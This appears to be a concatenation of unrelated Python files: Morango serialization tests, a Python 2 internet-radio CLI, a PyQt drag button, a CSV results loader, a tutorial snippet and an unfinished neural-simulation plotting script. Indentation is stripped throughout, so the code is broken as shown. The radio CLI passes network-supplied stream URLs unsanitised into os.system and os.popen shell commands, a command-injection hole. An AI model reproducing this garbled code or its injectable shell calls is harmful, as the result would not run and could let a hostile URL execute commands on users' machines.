conflicting.insert(0, serialized)
conflicting.insert(0, json.dumps(user.serialize()))
# set store record and app record dirty bits to true to force serialization merge conflict
Store.objects.update(conflicting_serialized_data=serialized, dirty_bit=True)
user.username = "user1"
user.save(update_dirty_bit_to=True)
self.mc.serialize_into_store()
# assert we have placed serialized object into store's serialized field
st = Store.objects.get(id=user.id)
self.assertEqual(json.loads(st.serialized), user.serialize())
# assert store serialized field is moved to conflicting data
conflicting_serialized_data = st.conflicting_serialized_data.split("\n")
for x in range(len(conflicting)):
self.assertEqual(conflicting[x], conflicting_serialized_data[x])
def test_filtered_serialization_single_filter(self):
fac = FacilityModelFactory()
user = MyUser.objects.create(username="deadbeef")
log = SummaryLog.objects.create(user=user)
self.mc.serialize_into_store(filter=Filter(user._morango_partition))
self.assertFalse(Store.objects.filter(id=fac.id).exists())
self.assertTrue(Store.objects.filter(id=user.id).exists())
self.assertTrue(Store.objects.filter(id=log.id).exists())
def test_filtered_serialization_multiple_filter(self):
fac = FacilityModelFactory()
user = MyUser.objects.create(username="deadbeef")
user2 = MyUser.objects.create(username="alivebeef")
log = SummaryLog.objects.create(user=user)
self.mc.serialize_into_store(
filter=Filter(user._morango_partition + "\n" + user2._morango_partition)
)
self.assertFalse(Store.objects.filter(id=fac.id).exists())
self.assertTrue(Store.objects.filter(id=user2.id).exists())
self.assertTrue(Store.objects.filter(id=user.id).exists())
self.assertTrue(Store.objects.filter(id=log.id).exists())
def test_self_ref_fk_class_adds_value_to_store(self):
root = FacilityModelFactory()
child = FacilityModelFactory(parent=root)
self.mc.serialize_into_store()
self.assertEqual(Store.objects.get(id=child.id)._self_ref_fk, root.id)
def test_regular_class_leaves_value_blank_in_store(self):
log = SummaryLog.objects.create(user=MyUser.objects.create(username="user"))
self.mc.serialize_into_store()
self.assertEqual(Store.objects.get(id=log.id)._self_ref_fk, "")
def test_previously_deleted_store_flag_resets(self):
# create and delete object
user = MyUser.objects.create(username="user")
user_id = user.id
self.mc.serialize_into_store()
MyUser.objects.all().delete()
self.mc.serialize_into_store()
self.assertTrue(Store.objects.get(id=user_id).deleted)
# recreate object with same id
user = MyUser.objects.create(username="user")
# ensure deleted flag is updated after recreation
self.mc.serialize_into_store()
self.assertFalse(Store.objects.get(id=user_id).deleted)
def test_previously_hard_deleted_store_flag_resets(self):
# create and delete object
user = MyUser.objects.create(username="user")
user_id = user.id
self.mc.serialize_into_store()
user.delete(hard_delete=True)
self.mc.serialize_into_store()
self.assertTrue(Store.objects.get(id=user_id).hard_deleted)
# recreate object with same id
user = MyUser.objects.create(username="user")
# ensure hard deleted flag is updated after recreation
self.mc.serialize_into_store()
self.assertFalse(Store.objects.get(id=user_id).hard_deleted)
def test_hard_delete_wipes_serialized(self):
user = MyUser.objects.create(username="user")
log = SummaryLog.objects.create(user=user)
self.mc.serialize_into_store()
Store.objects.update(conflicting_serialized_data="store")
st = Store.objects.get(id=log.id)
self.assertNotEqual(st.serialized, "")
self.assertNotEqual(st.conflicting_serialized_data, "")
user.delete(hard_delete=True) # cascade hard delete
self.mc.serialize_into_store()
st.refresh_from_db()
self.assertEqual(st.serialized, "{}")
self.assertEqual(st.conflicting_serialized_data, "")
def test_in_app_hard_delete_propagates(self):
user = MyUser.objects.create(username="user")
log_id = uuid.uuid4().hex
log = SummaryLog(user=user, id=log_id)
StoreModelFacilityFactory(
model_name="user", id=user.id, serialized=json.dumps(user.serialize())
)
store_log = StoreModelFacilityFactory(
model_name="contentsummarylog",
id=log.id,
serialized=json.dumps(log.serialize()),
)
user.delete(hard_delete=True)
# preps log to be hard_deleted
self.mc.deserialize_from_store()
# updates store log to be hard_deleted
self.mc.serialize_into_store()
store_log.refresh_from_db()
self.assertTrue(store_log.hard_deleted)
self.assertEqual(store_log.serialized, "{}")
def test_store_hard_delete_propagates(self):
user = MyUser(username="user")
user.save(update_dirty_bit_to=False)
log = SummaryLog(user=user)
log.save(update_dirty_bit_to=False)
StoreModelFacilityFactory(
model_name="user",
id=user.id,
serialized=json.dumps(user.serialize()),
hard_deleted=True,
deleted=True,
)
# make sure hard_deleted propagates to related models even if they are not hard_deleted
self.mc.deserialize_from_store()
self.assertTrue(HardDeletedModels.objects.filter(id=log.id).exists())
class RecordMaxCounterUpdatesDuringSerialization(TestCase):
def setUp(self):
(self.current_id, _) = InstanceIDModel.get_or_create_current_instance()
self.mc = MorangoProfileController("facilitydata")
self.fac1 = FacilityModelFactory(name="school")
self.mc.serialize_into_store()
self.old_rmc = RecordMaxCounter.objects.first()
def test_new_rmc_for_existing_model(self):
with EnvironmentVarGuard() as env:
env['MORANGO_SYSTEM_ID'] = 'new_sys_id'
(new_id, _) = InstanceIDModel.get_or_create_current_instance(clear_cache=True)
Facility.objects.update(name="facility")
self.mc.serialize_into_store()
new_rmc = RecordMaxCounter.objects.get(
instance_id=new_id.id, store_model_id=self.fac1.id
)
new_store_record = Store.objects.get(id=self.fac1.id)
self.assertEqual(new_rmc.counter, new_store_record.last_saved_counter)
self.assertEqual(new_rmc.instance_id, new_store_record.last_saved_instance)
def test_update_rmc_for_existing_model(self):
Facility.objects.update(name="facility")
self.mc.serialize_into_store()
# there should only be 1 RecordMaxCounter for a specific instance_id and a specific model (unique_together)
self.assertEqual(
RecordMaxCounter.objects.filter(
instance_id=self.current_id.id, store_model_id=self.fac1.id
).count(),
1,
)
new_rmc = RecordMaxCounter.objects.get(
instance_id=self.current_id.id, store_model_id=self.fac1.id
)
new_store_record = Store.objects.get(id=self.fac1.id)
self.assertEqual(self.old_rmc.counter + 1, new_rmc.counter)
self.assertEqual(new_rmc.counter, new_store_record.last_saved_counter)
self.assertEqual(new_rmc.instance_id, new_store_record.last_saved_instance)
def test_new_rmc_for_non_existent_model(self):
with EnvironmentVarGuard() as env:
env['MORANGO_SYSTEM_ID'] = 'new_sys_id'
(new_id, _) = InstanceIDModel.get_or_create_current_instance(clear_cache=True)
new_fac = FacilityModelFactory(name="college")
self.mc.serialize_into_store()
new_rmc = RecordMaxCounter.objects.get(
instance_id=new_id.id, store_model_id=new_fac.id
)
new_store_record = Store.objects.get(id=new_fac.id)
self.assertNotEqual(new_id.id, self.current_id.id)
self.assertEqual(new_store_record.last_saved_instance, new_rmc.instance_id)
self.assertEqual(new_store_record.last_saved_counter, new_rmc.counter)
class DeserializationFromStoreIntoAppTestCase(TestCase):
def setUp(self):
(self.current_id, _) = InstanceIDModel.get_or_create_current_instance()
self.range = 10
self.mc = MorangoProfileController("facilitydata")
for i in range(self.range):
self.ident = uuid.uuid4().hex
StoreModelFacilityFactory(
pk=self.ident, serialized=serialized_facility_factory(self.ident)
)
def test_dirty_store_records_are_deserialized(self):
self.assertFalse(Facility.objects.all().exists())
self.mc.deserialize_from_store()
self.assertEqual(len(Facility.objects.all()), self.range)
def test_clean_store_records_do_not_get_deserialized(self):
self.assertFalse(Facility.objects.exists())
Store.objects.update(dirty_bit=False)
self.mc.deserialize_from_store()
self.assertFalse(Facility.objects.exists())
def test_deleted_models_do_not_get_deserialized(self):
Store.objects.update_or_create(defaults={"deleted": True}, id=self.ident)
self.mc.deserialize_from_store()
self.assertFalse(Facility.objects.filter(id=self.ident).exists())
def test_deleted_models_deletes_them_in_app(self):
# put models in app layer
self.mc.deserialize_from_store()
# deleted flag on store should delete model in app layer
Store.objects.update_or_create(
defaults={"deleted": True, "dirty_bit": True}, id=self.ident
)
self.mc.deserialize_from_store()
self.assertFalse(Facility.objects.filter(id=self.ident).exists())
def test_update_app_with_newer_data_from_store(self):
name = "test"
fac = FacilityModelFactory(id=self.ident, name=name)
fac.save(update_dirty_bit_to=False)
self.assertEqual(fac.name, name)
self.mc.deserialize_from_store()
fac = Facility.objects.get(id=self.ident)
self.assertNotEqual(fac.name, name)
def test_handle_extra_field_deserialization(self):
# modify a store record by adding extra serialized field
store_model = Store.objects.get(id=self.ident)
serialized = json.loads(store_model.serialized)
serialized.update({"wacky": True})
store_model.serialized = json.dumps(serialized)
store_model.save()
# deserialize records
self.mc.deserialize_from_store()
# by this point no errors should have occurred but we check list of fields anyways
fac = Facility.objects.get(id=self.ident)
self.assertNotIn("wacky", fac.__dict__)
def test_store_dirty_bit_resets(self):
self.assertTrue(Store.objects.filter(dirty_bit=True))
self.mc.deserialize_from_store()
self.assertFalse(Store.objects.filter(dirty_bit=True))
def test_record_with_dirty_bit_off_doesnt_deserialize(self):
st = Store.objects.first()
st.dirty_bit = False
st.save()
self.mc.deserialize_from_store()
self.assertFalse(Facility.objects.filter(id=st.id).exists())
def test_broken_fk_leaves_store_dirty_bit(self):
serialized = """{"user_id": "40de9a3fded95d7198f200c78e559353", "id": "bd205b5ee5bc42da85925d24c61341a8"}"""
st = StoreModelFacilityFactory(
id=uuid.uuid4().hex, serialized=serialized, model_name="contentsummarylog"
)
self.mc.deserialize_from_store()
st.refresh_from_db()
self.assertTrue(st.dirty_bit)
def test_invalid_model_leaves_store_dirty_bit(self):
user = MyUser(username="a" * 21)
st = StoreModelFacilityFactory(
model_name="user",
id=uuid.uuid4().hex,
serialized=json.dumps(user.serialize()),
)
self.mc.deserialize_from_store()
st.refresh_from_db()
self.assertTrue(st.dirty_bit)
def test_deleted_model_propagates_to_store_record(self):
"""
It could be the case that we have two store records, one that is deleted and the other that has a fk pointing to the deleted record.
When we deserialize, we want to ensure that the record with the fk pointer also gets the deleted flag set, while also not
deserializing the data into a model.
"""
# user will be deleted
user = MyUser(username="user")
user.save(update_dirty_bit_to=False)
# log may be synced in from other device
log = SummaryLog(user_id=user.id)
log.id = log.calculate_uuid()
StoreModelFacilityFactory(
model_name="user",
id=user.id,
serialized=json.dumps(user.serialize()),
deleted=True,
)
StoreModelFacilityFactory(
model_name="contentsummarylog",
id=log.id,
serialized=json.dumps(log.serialize()),
)
# make sure delete propagates to store due to deleted foreign key
self.mc.deserialize_from_store()
# have to serialize to update deleted models
self.mc.serialize_into_store()
self.assertFalse(SummaryLog.objects.filter(id=log.id).exists())
self.assertTrue(Store.objects.get(id=log.id).deleted)
def test_hard_deleted_model_propagates_to_store_record(self):
"""
It could be the case that we have two store records, one that is hard deleted and the other that has a fk pointing to the hard deleted record.
When we deserialize, we want to ensure that the record with the fk pointer also gets the hard deleted flag set, while also not
deserializing the data into a model.
"""
# user will be deleted
user = MyUser(username="user")
user.save(update_dirty_bit_to=False)
# log may be synced in from other device
log = SummaryLog(user_id=user.id)
log.id = log.calculate_uuid()
StoreModelFacilityFactory(
model_name="user",
id=user.id,
serialized=json.dumps(user.serialize()),
deleted=True,
hard_deleted=True,
)
StoreModelFacilityFactory(
model_name="contentsummarylog",
id=log.id,
serialized=json.dumps(log.serialize()),
)
# make sure delete propagates to store due to deleted foreign key
self.mc.deserialize_from_store()
# have to serialize to update deleted models
self.mc.serialize_into_store()
self.assertFalse(SummaryLog.objects.filter(id=log.id).exists())
self.assertTrue(Store.objects.get(id=log.id).hard_deleted)
def _create_two_users_to_deserialize(self):
user = MyUser(username="test", password="password")
user2 = MyUser(username="test2", password="password")
user.save()
user2.save()
self.mc.serialize_into_store()
user.username = "changed"
user2.username = "changed2"
Store.objects.filter(id=user.id).update(serialized=json.dumps(user.serialize()), dirty_bit=True)
Store.objects.filter(id=user2.id).update(serialized=json.dumps(user2.serialize()), dirty_bit=True)
return user, user2
def test_regular_model_deserialization(self):
# deserialization should be able to handle multiple records
user, user2 = self._create_two_users_to_deserialize()
self.mc.deserialize_from_store()
self.assertFalse(MyUser.objects.filter(username="test").exists())
self.assertFalse(MyUser.objects.filter(username="test2").exists())
self.assertTrue(MyUser.objects.filter(username="changed").exists())
self.assertTrue(MyUser.objects.filter(username="changed2").exists())
def test_filtered_deserialization(self):
# filtered deserialization only impacts specific records
user, user2 = self._create_two_users_to_deserialize()
self.mc.deserialize_from_store(filter=Filter(user._morango_partition))
self.assertFalse(MyUser.objects.filter(username="test").exists())
self.assertTrue(MyUser.objects.filter(username="test2").exists())
self.assertTrue(MyUser.objects.filter(username="changed").exists())
self.assertFalse(MyUser.objects.filter(username="changed2").exists())
class SelfReferentialFKDeserializationTestCase(TestCase):
def setUp(self):
(self.current_id, _) = InstanceIDModel.get_or_create_current_instance()
self.mc = MorangoProfileController("facilitydata")
def test_self_ref_fk(self):
self.assertEqual(_self_referential_fk(Facility), "parent_id")
self.assertEqual(_self_referential_fk(MyUser), None)
def test_delete_model_in_store_deletes_models_in_app(self):
root = FacilityModelFactory()
child1 = FacilityModelFactory(parent=root)
child2 = FacilityModelFactory(parent=root)
self.mc.serialize_into_store()
# simulate a node being deleted and synced
Store.objects.filter(id=child2.id).update(deleted=True)
Store.objects.update(dirty_bit=True)
grandchild1 = FacilityModelFactory(parent=child2)
grandchild2 = FacilityModelFactory(parent=child2)
self.mc.deserialize_from_store()
# ensure tree structure in app layer is correct
child1 = Facility.objects.filter(id=child1.id)
self.assertTrue(child1.exists())
self.assertEqual(child1[0].parent_id, root.id)
self.assertFalse(Facility.objects.filter(id=child2.id).exists())
self.assertFalse(Facility.objects.filter(id=grandchild1.id).exists())
self.assertFalse(Facility.objects.filter(id=grandchild2.id).exists())
def test_models_created_successfully(self):
root = FacilityModelFactory()
child1 = FacilityModelFactory(parent=root)
child2 = FacilityModelFactory(parent=root)
self.mc.serialize_into_store()
Facility.objects.all().delete()
DeletedModels.objects.all().delete()
Store.objects.update(dirty_bit=True, deleted=False)
self.mc.deserialize_from_store()
# ensure tree structure in app layer is correct
self.assertTrue(Facility.objects.filter(id=root.id).exists())
child1 = Facility.objects.filter(id=child1.id)
self.assertTrue(child1.exists())
self.assertEqual(child1[0].parent_id, root.id)
child2 = Facility.objects.filter(id=child2.id)
self.assertTrue(child2.exists())
self.assertEqual(child2[0].parent_id, root.id)
def test_deserialization_of_model_with_missing_parent(self):
self._test_deserialization_of_model_with_missing_parent(correct_self_ref_fk=True)
def test_deserialization_of_model_with_mismatched_self_ref_fk(self):
self._test_deserialization_of_model_with_missing_parent(correct_self_ref_fk=False)
def _test_deserialization_of_model_with_missing_parent(self, correct_self_ref_fk):
root = FacilityModelFactory()
child1 = FacilityModelFactory(parent=root)
self.mc.serialize_into_store()
new_child = Store.objects.get(id=child1.id)
data = json.loads(new_child.serialized)
new_child.id = data["id"] = "a" * 32
data["parent_id"] = "b" * 32
if correct_self_ref_fk:
new_child._self_ref_fk = data["parent_id"]
new_child.serialized = json.dumps(data)
new_child.dirty_bit = True
new_child.save()
self.mc.deserialize_from_store()
new_child.refresh_from_db()
self.assertTrue(new_child.dirty_bit)
self.assertIn("exist", new_child.deserialization_error)
def test_deserialization_of_model_with_missing_foreignkey_referent(self):
user = MyUser.objects.create(username="penguin")
log = SummaryLog.objects.create(user=user)
self.mc.serialize_into_store()
new_log = Store.objects.get(id=log.id)
data = json.loads(new_log.serialized)
new_log.id = data["id"] = "f" * 32
data["user_id"] = "e" * 32
new_log.serialized = json.dumps(data)
new_log.dirty_bit = True
new_log.save()
self.mc.deserialize_from_store()
new_log.refresh_from_db()
self.assertTrue(new_log.dirty_bit)
self.assertIn("exist", new_log.deserialization_error)
|
nilq/baby-python
|
python
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os,sys
import inquirer
import untangle
import requests
import platform
from colors import *
#If you want to use the program using an alias
#uncomment the following line and write your correct path
#os.chdir("/home/user/test/tunein-cli/")
type={}
station={}
headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:74.0) Gecko/20100101 Firefox/74.0' }
source="http://opml.radiotime.com/Browse.ashx"
ERASE_LINE = '\x1b[1J'
ERASE_ALL = '\x1b[g'
GO_HOME = '\x1b[H'
SCROLL = '\x1b[1000M'
sys.stdout.write(ERASE_LINE)
sys.stdout.write(GO_HOME)
erase="clear && printf '\e[3J'"
if "Windows" in platform.system():
erase="cls"
#check mplayer
try:
std=os.popen("mplayer").read()
if len(std) == 0:
raise
except:
print underline('\nmplayer is not installed\nPlease install mplayer first.')
exit()
def get(url,s):
    page = requests.get(url, headers=headers)
xml=page.content
if s=="true":
obj = untangle.parse(xml)
return obj
else:
return xml
def scrape(url,keyword):
if url=="":
url=source
os.system(erase)
out=['<<back']
dup_out=['<<back']
type={}
station={}
obj=get(url,"true")
if keyword!="":
stream=get(url,"true")
if dir(stream.opml.body.outline).count("outline")>2:
for i in obj.opml.body.outline.outline:
type[i["text"]]=i["URL"]
else:
if isinstance(keyword, int)==True:
target=keyword
else:
for i in stream.opml.body.outline:
if i['key'] == keyword:
target=stream.opml.body.outline.index(i)
for i in obj.opml.body.outline[target].outline:
type[i["text"]]=i["URL"]
else:
for i in obj.opml.body.outline:
type[i["text"]]=i["URL"]
a=1
for i in type.keys():
if i.strip() == "More Stations":
st1="[%s] " %(a)
st2=green(i)
out.insert(1,"%s%s" %(st1,st2))
dup_out.insert(1,"%s%s" %(st1,st2))
elif i.strip() == "Find by Name":
st1="[%s] " %(a)
st2=red(i)
out.insert(2,"%s%s" %(st1,st2))
dup_out.insert(2,"%s%s" %(st1,st2))
else:
st1="[%s] " %(a)
st2=u''.join(i).encode("utf-8")
out.append("%s%s" %(st1,bold(st2)))
dup_out.append("%s%s" %(st1,st2))
a+=1
ask=[inquirer.List('opt',message="Choose:",choices=out)]
ans=inquirer.prompt(ask)['opt']
if ans == "<<back":
main()
else:
choice=int(dup_out[out.index(ans)].split()[0][1:-1])
choice-=1
st_url=type[type.keys()[choice]]
if st_url != None and "Tune.ashx?id" in st_url:
st_title=type.keys()[choice]
newurl=get(st_url,"false")
if len(newurl.split())>1:
newurl=newurl.split()[0]
playlist(newurl,st_title)
if st_url==None:
tt=dup_out[out.index(ans)].split()
tt.remove(dup_out[out.index(ans)].split()[0])
for i in obj.opml.body.outline:
if i["text"]==" ".join(tt):
key=i["key"]
if key==None:
key=choice
#print "SCRAPE:",url,key
scrape(url,key)
scrape(st_url,"")
def playlist(url,title):
global run
print "\nTitle:",bold(u''.join(title).encode("utf-8"))
print "STREAM:",bold(url)
if ".pls" in url:
print "pls file found"
url=os.popen("python getter.py '%s false'" %(url.strip())).read()[6:]
print "FOUND:",url
if run=="true":
print "Opening stream..."
print "To stop streaming press enter:"
os.system("mplayer -really-quiet %s" %(url))
print ""
kill=raw_input("exit:")
os.system("pkill -9 mplayer")
main()
elif run == "false":
try:
title.encode('ascii')
new_title=title
if new_title.startswith(".")==True:
new_title=new_title[1:]
except UnicodeEncodeError:
new_title="".join(x for x in title if x.isalnum())
if new_title.startswith(".")==True:
new_title=new_title[1:]
new_title=new_title.encode('utf8')
#title="playlist"
file=open("%s.pls" %(new_title),"w")
file.write("[playlist]")
file.write("\nFile1=%s" %(url.strip()))
file.write("\nTitle1=%s" %(r''.join(new_title)))
file.write("\nLength1=-1")
file.write("\nNumberOfEntries=1")
file.write("\nVersion=2")
file.close()
print bold("Location: "+os.path.abspath("%s.pls" %(new_title)))
print "done."
exit()
elif run == "info":
exit()
elif run == "browser":
print "Opening stream in browser..."
if "Linux" in platform.system():
os.popen("xdg-open %s" %(url))
elif "Darwin" in platform.system():
os.popen("open %s" %(url))
elif "Windows" in platform.system():
os.popen("start %s" %(url))
main()
elif run == "fav":
fav=open("fav_st.txt","a+")
fav.write("%s %s" %(u''.join(title).encode("utf-8"),url))
fav.close()
print "added.\npress enter to continue:", raw_input()
main()
#START from HERE
def main():
global run
run="false"
os.system(erase)
ask1=[inquirer.List('opt',message="Select Option:",choices=[
'[1]'+bold(': Open Stream'),
'[2]'+bold(': Download Stream'),
'[3]'+bold(': Show Stream Source'),
'[4]'+bold(': Open In Browser'),
'[5]'+bold(': Add to Favourites'),
'[6]'+bold(': Add custom station'),
'[7]'+bold(': Favourites'),
'[8]'+bold(': Exit')])]
ans1=inquirer.prompt(ask1)['opt']
if ans1[1:2] == "1":
run="true"
elif ans1[1:2] == "2":
run="false"
elif ans1[1:2] == "3":
run="info"
elif ans1[1:2] == "4":
run="browser"
elif ans1[1:2] == "5":
run="fav"
elif ans1[1:2] == "6":
c_name=raw_input(bold("Name:"))
c_url=raw_input(bold("Address:"))
fav=open("fav_st.txt","a+")
fav.write("%s %s" %(u''.join(c_name).encode("utf-8"),c_url))
fav.close()
print "added.\npress enter to continue:", raw_input()
main()
elif ans1[1:2] == "7":
favlist={}
dupfavlist=["<<back"]
dup2favlist=["<<back"]
fav=open("fav_st.txt","r").read().splitlines()
for item in fav:
if len(item)!=0:
favlist[" ".join(item.split()[0:-1])]=item.split()[-1]
dupfavlist.append(" ".join(item.split()[0:-1]))
dup2favlist.append(bold(" ".join(item.split()[0:-1])))
os.system(erase)
ask2=[inquirer.List('opt',message="Choose:",choices=dup2favlist)]
ans2=inquirer.prompt(ask2)['opt']
if ans2 == "<<back":
main()
run="true"
playlist(favlist[dupfavlist[dup2favlist.index(ans2)]],ans2.decode("utf-8"))
elif ans1[1:2] == "8":
print bold("Bye.")
exit()
scrape("","")
main()
|
nilq/baby-python
|
python
|
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
# Allows to drag parent widget when holding pushbutton
# To use it you need to set screen_geometry in your QWidget first
class DragButton(QPushButton):
def __init__(self, parent: QWidget, constant_x0: bool):
super(DragButton, self).__init__()
self.parent = parent
self.__mousePressPos = None
self.__mouseMovePos = None
self.constantX0 = constant_x0 # left edge of screen
self.posY = 0
def mousePressEvent(self, event: QMouseEvent) -> None:
if event.button() == Qt.LeftButton:
self.__mousePressPos = event.globalPos()
self.__mouseMovePos = event.globalPos()
super(DragButton, self).mousePressEvent(event)
def mouseMoveEvent(self, event: QMouseEvent) -> None:
if event.buttons() == Qt.LeftButton:
# adjust offset from clicked point to origin of widget
curr_pos = self.parent.mapToGlobal(self.parent.pos())
global_pos = event.globalPos()
diff = global_pos - self.__mouseMovePos
new_pos = self.parent.mapFromGlobal(curr_pos + diff)
if self.constantX0:
new_pos.setX(0)
if new_pos.y() < 0:
new_pos.setY(0)
if new_pos.y() > self.parent.screen_geometry.bottom() - self.parent.height():
new_pos.setY(self.parent.screen_geometry.bottom() - self.parent.height())
self.parent.move(new_pos)
self.__mouseMovePos = global_pos
super(DragButton, self).mouseMoveEvent(event)
def mouseReleaseEvent(self, event: QMouseEvent) -> None:
if self.__mousePressPos is not None:
moved = event.globalPos() - self.__mousePressPos
if moved.manhattanLength() > 3:
event.ignore()
# print("Menu Y: %d" % self.parent.mapToGlobal(self.parent.pos()).y())
self.posY = self.parent.mapToGlobal(self.parent.pos()).y()
elif hasattr(self.parent, "show_hide_buttons"):
# Since this class is used in MainWidget AND NetWidget need to check which one is calling
# and hide parents buttons only if it has method for that.
# Cannot use isinstance() because importing MainWidget would cause circular import.
show_hide_buttons = getattr(self.parent, "show_hide_buttons")
if hasattr(show_hide_buttons, "__call__"):
show_hide_buttons()
if hasattr(self.parent, "update_pos_size"):
update_pos_size = getattr(self.parent, "update_pos_size")
if hasattr(update_pos_size, "__call__"):
update_pos_size()
else:
super(DragButton, self).mouseReleaseEvent(event)
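
# Minimal usage sketch (illustrative, not part of the original file): the
# parent widget must expose a screen_geometry attribute, as noted above.
if __name__ == "__main__":
    import sys
    app = QApplication(sys.argv)
    window = QWidget()
    window.screen_geometry = app.primaryScreen().availableGeometry()
    layout = QVBoxLayout(window)
    btn = DragButton(window, constant_x0=False)
    btn.setText("drag me")
    layout.addWidget(btn)
    window.show()
    sys.exit(app.exec_())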
|
nilq/baby-python
|
python
|
from csv import reader
from . import Destination
from . import DestinationPro
from . import ProtocolPort
def read_prot_port_info(info):
prot_info = {"HTTP": ["1", "1", "1"], "HTTPS": ["1", "0", "1"]}
with open(info, "r") as f:
csv_reader = reader(f)
next(csv_reader)
for row in csv_reader:
prot_port = row[0].upper()
well_known = row[1]
human_readable = row[2]
imp = row[4]
prot_info[prot_port] = [well_known, human_readable, imp]
return prot_info
#constructs DestinationPros from an output CSV
#useful for generating plots without having to rerun analyses
def load(script_dir, out_csv_path):
print("Loading results from %s..." % out_csv_path)
prot_enc_dict = {"encrypted": "1", "unencrypted": "0", "unknown": "-1"}
prots_info = read_prot_port_info(script_dir + "/protocol_analysis/protocols_info.csv")
dst_pro = []
with open(out_csv_path, "r") as f:
csv_reader = reader(f)
next(csv_reader)
for row in csv_reader:
ip = row[0]
host = row[1]
host_full = row[2]
bytes_snd = row[3]
bytes_rcv = row[4]
pckt_snd = row[5]
pckt_rcv = row[6]
country = row[7]
party = row[8]
org = row[9]
prot_port = row[10]
enc = row[11]
dst = Destination.Destination(ip, host, party, host_full, country, org)
try:
prot_info = prots_info[prot_port.upper()]
prot = ProtocolPort.ProtocolPort(prot_port, prot_enc_dict[enc.lower()],
prot_info[0], prot_info[1], prot_info[2])
except KeyError:
prot = ProtocolPort.ProtocolPort(prot_port, '-1', '-1', '-1', '-1')
dp = DestinationPro.DestinationPro(dst, prot)
dp.add_all(int(bytes_snd), int(bytes_rcv), int(pckt_snd), int(pckt_rcv))
dst_pro.append(dp)
return dst_pro
|
nilq/baby-python
|
python
|
# When running, comment out the sections you don't need
# dynamic typing
var = 'Hello World' # string
print(var)
var = 100 # int
print(var+10)
print('-----')
# no integer overflow (Python ints have arbitrary precision)
var = 17**3000 # 17 to the power of 3000
print(var)
print('-----')
# swap
a=1
b=2
c=3
print(a,b,c)
c,a,b=b,c,a
print(a,b,c)
print('-----')
# string index
var1 = 'Hello World'
var2 = "Python Programming"
print(var1[0]) # 'H', indexing starts at 0
print(var2[1:5]) # "ytho", indices 1 up to but not including 5
print('-----')
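# negative indexing (added example)
print(var1[-1])   # 'd', the last character of 'Hello World'
print(var2[-11:]) # 'Programming', the last 11 characters
print('-----')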
|
nilq/baby-python
|
python
|
import os, sys, inspect
# use this if you want to include modules from a subforder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import simulation_parameters
import numpy as np
import pylab
import MergeSpikefiles
from FigureCreator import plot_params
import matplotlib.cm as cm
import json
def plot_raster(params, fn, ax, pn, title='', color='k', alpha=1.):
    print 'Loading spikes from:', params['%s_spiketimes_merged_fn_base' % cell_type]
if (os.path.exists(fn) == False):
Merger = MergeSpikefiles.MergeSpikefiles(params)
Merger.merge_spiketimes_files(params['%s_spiketimes_fn_base' % (cell_type)], params['%s_spiketimes_merged_fn_base' % (cell_type)], pn)
print 'Loading ', fn
data = np.loadtxt(fn)
assert (data.size > 0), 'ERROR file %s has 0 size\nIf there was a problem when merging them, delete the empty one and rerun' % (fn)
ax.plot(data[:,0], data[:,1], 'o', markersize=5, markeredgewidth=.0, color=color, alpha=alpha)
ax.set_xlim((0, params['t_sim']))
ax.set_title(title)
ax.set_xlabel('Time [ms]')
# ax.set_ylabel('Cell GID')
ylabels = ax.get_yticklabels()
yticks = ax.get_yticks()
new_ylabels = []
for i_, y in enumerate(yticks[0:]):
# for i_, y in enumerate(yticks[1:]):
new_ylabels.append('%d' % (y - params['%s_offset' % cell_type]))
ax.set_ylim((-1 + params['%s_offset' % cell_type], params['n_%s' % cell_type] + params['%s_offset' % cell_type] + 1))
if len(new_ylabels) > 0:
ax.set_yticklabels(new_ylabels)
xlabels = ax.get_xticklabels()
xticks = ax.get_xticks()
new_xlabels = ['']
for i_, x in enumerate(xticks[1:-1]):
# for i_, x in enumerate(xticks[1:]):
new_xlabels.append('%d' % x)
new_xlabels.append('')
ax.set_xticklabels(new_xlabels)
def get_sniff_amplitude(x, tstart, tstop, T, t_shift, amp):
f_x = 0
if (x > tstart) and (x < tstop):
f_x = (amp * (np.sin(x / (T) - t_shift))**2)
return f_x
def plot_sniff_input(params, ax):
if params['with_sniffing_input']:
tstop = params['t_stop'] = 1200 # [ms]
tstart = params['t_start'] = 200 # [ms]
T = params['sniff_period'] = 80. # [ms]
t_shift = params['t_shift_sniff'] = 40. # [ms]
else:
        print('This was run without sniffing input\nReturning None')
return None
times = np.arange(0, params['t_sim'], 5)
ylim = ax.get_ylim()
alpha_max = .2
c = 'b'
for t in times:
f_x = get_sniff_amplitude(t, tstart, tstop, T, t_shift, 1.0)
# print 'f_x', f_x
ax.plot((t, t), (ylim[0], ylim[1]), lw=4, ls='-', c=c, alpha=f_x * alpha_max)
if __name__ == '__main__':
info_txt = \
"""
Usage:
python plot_pattern_completion_rivalry.py [PATTERN_NUMBER]
"""
# python plot_pattern_completion_rivalry.py [TRAINING_FOLDER] [TEST_FOLDER] [PATTERN_NUMBER_MIN] [PATTERN_NUMBER_MAX]
assert (len(sys.argv) > 1), 'ERROR: pattern number not given\n' + info_txt
pn_max = int(sys.argv[1])
training_folder = 'Cluster_OcOcLearning_nGlom40_nHC12_nMC30_vqOvrlp4_np50_OcOnly/'
plot_folder = 'Cluster_PatternCompletionTestPostLearningWithSniff_fOR0.50_nGlom40_nHC12_nMC30_vqOvrlp4_np50_FullSystem/'
params_fn = os.path.abspath(plot_folder) + '/Parameters/simulation_parameters.json'
param_tool = simulation_parameters.parameter_storage(params_fn=params_fn)
params = param_tool.params
training_params_fn = os.path.abspath(training_folder) + '/Parameters/simulation_parameters.json'
training_param_tool = simulation_parameters.parameter_storage(params_fn=training_params_fn)
training_params = training_param_tool.params
cell_type = 'readout'
# cell_type = 'pyr'
# cell_type = 'mit'
    for pn in range(pn_max):
training_fn = training_params['%s_spiketimes_merged_fn_base' % cell_type] + str(pn) + '.dat'
test_fn = params['%s_spiketimes_merged_fn_base' % cell_type] + str(pn) + '.dat'
plot_params['figure.subplot.left'] = .11
plot_params['figure.subplot.top'] = .92
plot_params['figure.subplot.right'] = .98
plot_params['xtick.labelsize'] = 24
plot_params['ytick.labelsize'] = 24
plot_params['axes.labelsize'] = 32
plot_params['axes.titlesize'] = 32
pylab.rcParams.update(plot_params)
fig = pylab.figure()
